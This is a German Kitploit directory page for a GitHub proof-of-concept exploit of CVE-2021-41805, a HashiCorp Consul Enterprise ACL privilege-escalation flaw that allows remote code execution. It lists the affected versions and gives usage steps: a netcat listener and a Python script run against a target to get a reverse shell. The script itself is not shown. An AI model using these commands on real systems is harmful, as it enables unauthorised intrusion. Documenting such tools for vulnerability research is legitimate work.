Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-41805 — Ein Proof-of-Concept für CVE-2021-41805, der eine Sicherheitslücke in HashiCorp Consul Enterprise ist, die Remote Code Execution (RCE) mit erhöhten Privilegien ermöglicht. | Kitploit
Tools/GitHubGitHub/acfirthh/cve-2021-41805
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstestsCloud-SicherheitLernen & BildungRemote-Access-Tool
GitHubacfirthh/cve-2021-41805

CVE-2021-41805

Ein Proof-of-Concept für CVE-2021-41805, der eine Sicherheitslücke in HashiCorp Consul Enterprise ist, die Remote Code Execution (RCE) mit erhöhten Privilegien ermöglicht.

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-41805 - HashiCorp Consul Enterprise RCE

[!WARNING] RECHTLICHER HINWEIS: Dieses Tool ist STRENGSTENS NUR FÜR BILDUNGSZWECKE bestimmt! Die Verwendung dieses Tools zum Angriff auf Ziele ohne vorherige gegenseitige Zustimmung ist ILLEGAL. Es liegt in der Verantwortung des Benutzers, alle geltenden Gesetze einzuhalten. Der Entwickler dieses Tools übernimmt keine Haftung und ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Programm verursacht werden.

Über die CVE

Ein ACL-Token (mit den Standardberechtigungen operator:write) in einem Namespace kann für eine unbeabsichtigte Rechteausweitung in einem anderen Namespace verwendet werden. Dies kann missbraucht werden, um eine Remote Code Execution (RCE) mit erweiterten Privilegien zu erlangen.

Betroffene Versionen

  • < 1.8.17
  • 1.9.x < 1.9.11
  • 1.10.x < 1.10.4

Installation und Ausführung des Skripts

  • Klone zuerst das Repository:
    git clone https://github.com/acfirthh/CVE-2021-41805.git
  • Wechsle in das geklonte Repository:
    cd CVE-2021-41805
  • Starte einen einfachen Listener:
    nc -nvlp <LISTENER_PORT>
  • Führe das Skript aus:
    python3 CVE-2021-41805.py -r <TARGET_IP> -rp <TARGET_PORT> -l <LISTENER_IP> -lp <LISTENER_PORT> [OPTIONAL: -t <ACL token> -v (verbose) -s (use SSL)]

Reverse Shell

Erwartete Ausgabe

Die Ausführung des Exploits mit den grundlegenden Argumenten: -r [TARGET_IP], -rp [TARGET_PORT], -l [LISTENER_IP], -lp [LISTENER_PORT] (-t [ACL_TOKEN], -s [SSL verwenden]) wird eine einfache Ausgabe wie folgt liefern:

root@kitploit:~
[*] The PUT request was made successfully. Check your listener...

Die Ausführung des Exploits mit den grundlegenden Argumenten plus -v [VERBOSE] wird eine ausführliche Ausgabe liefern:
Verbose Output

Wenn ein Fehler auftritt, während der Exploit ausgeführt wird und das -v Argument angegeben ist, wird die Ausgabe etwa so aussehen:
Verbose Output with Error

Tool herunterladen